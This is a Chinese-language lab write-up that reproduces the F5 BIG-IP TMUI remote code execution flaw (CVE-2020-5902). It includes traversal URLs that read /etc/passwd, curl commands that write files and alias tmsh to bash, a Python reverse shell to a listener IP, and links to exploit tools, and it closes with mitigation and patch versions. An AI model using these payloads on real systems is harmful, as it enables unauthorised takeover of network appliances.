F5 BIG-IP遠端代碼執行漏洞(CVE-2020-5902)複現

0x00簡介

F5 BIG-IP 是美國``F5公司一款內建流量管理、DNS、出入站規則、web應用防火牆、web網關、負載均衡等功能的應用傳遞平台。 在F5 BIG-IP産品的流量管理使用者頁面 (TMUI)/配置程式的特定頁面中存在一處遠端代碼執行漏洞，導緻可以未授權通路TMUI子產品所有功能（包括未公開功能），漏洞影響範圍包括執行任意系統指令、任意檔案讀取、任意檔案寫入、開啟/禁用服務等。

0x02漏洞概述

攻擊者可利用該漏洞執行任意系統指令、建立或删除檔案、禁用服務、執行任意的Java代碼,可擷取shell完全控制目标系統。

0x03影響範圍

F5 BIG‐IP 15.1.0

F5 BIG‐IP 15.0.0

F5 BIG‐IP 14.1.0‐14.1.2

F5 BIG‐IP 13.1.0‐13.1.3

F5 BIG‐IP 12.1.0‐12.1.5

F5 BIG‐IP 11.6.1‐11.6.5

0x04環境搭建

1.在F5官網注冊登入下載下傳試用即可。

https://downloads.f5.com/esd/ecc.sv?sw=BIG-IP&pro=big-ip_v15.x&ver=15.1.0&container=Virtual-Edition

2.然後随便選擇一個下載下傳地區，下載下傳即可

3.下載下傳完成後，使用VMwear導入安裝

VMwear左上角‘檔案’->‘打開‘選擇下載下傳好的檔案

4.配置方面看自己的選擇導入後啟動即可系統預設賬戶：root/default登陸後需要修改預設密碼

5.輸入config，配置配置ip位址，點兩次Enter鍵即可

6.設定完IP後通路一下連結出現登入頁面安裝成功 //注要https加IP

https://172.16.1.186/tmui/login.jsp

0x05漏洞複現

1.登入管理頁面既是漏洞存在的地方，我們使用poc進行測試檔案讀取：

https://ip/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

https://ip/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/hosts

2.寫入檔案

curl -k -H "Content-Type: application/x-www-form-urlencoded" -X POST -d "fileName=/tmp/success&content=東塔網絡安全學院" "https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp"

3.讀取檔案

curl -k "https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/tmp/success"

1. 修改alias劫持list指令為bash

   curl -k "https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=create+cli+alias+private+list+command+bash"

   

4.1 寫入檔案：bash檔案

https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/test&content=id

4.2 執行bash檔案

https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+/tmp/test

注：因為權限不足無法完成此步操作，在實際環境中可以嘗試

5.反彈shell，寫入python反彈shell

https://172.16.1.200/tmui/login.jsp/..;/tmui/locallb/workspace/fileSave.jsp?fileName=/tmp/shell&content=python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('172.16.1.132',7856));<br>os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
           

使用kali做監聽

執行以下指令反彈shell //沒有權限這裡沒有反彈成功，可在實際環境中測試

6.利用工具

https://github.com/theLSA/f5-bigip-rce-cve-2020-5902

https://github.com/Critical-Start/Team-Ares/tree/master/CVE-2020-5902

0x06修複建議

1、官方建議可以通過以下步驟暫時緩解影響（臨時修複方案）

1.1使用以下指令登入對應系統：

tmsh

1.2編輯 httpd 元件的配置檔案；

edit /sys httpd all-properties

1.3檔案内容如下

include ' <LocationMatch "...;."> Redirect 404 / <\/LocationMatch> '

1.4按照如下操作儲存檔案；

按下 ESC 并依次輸入：

wq

1.5執行指令重新整理配置檔案；

save /sys config

1.6重新開機 httpd 服務。

restart sys service httpd

并禁止外部IP對 TMUI 頁面的通路。

2、更新到以下版本

BIG-IP 15.x: 15.1.0.4

BIG-IP 14.x: 14.1.2.6

BIG-IP 13.x: 13.1.3.4

BIG-IP 12.x: 12.1.5.2

BIG-IP 11.x: 11.6.5.2

參考連結

https://www.cnblogs.com/twosmi1e/p/13290290.html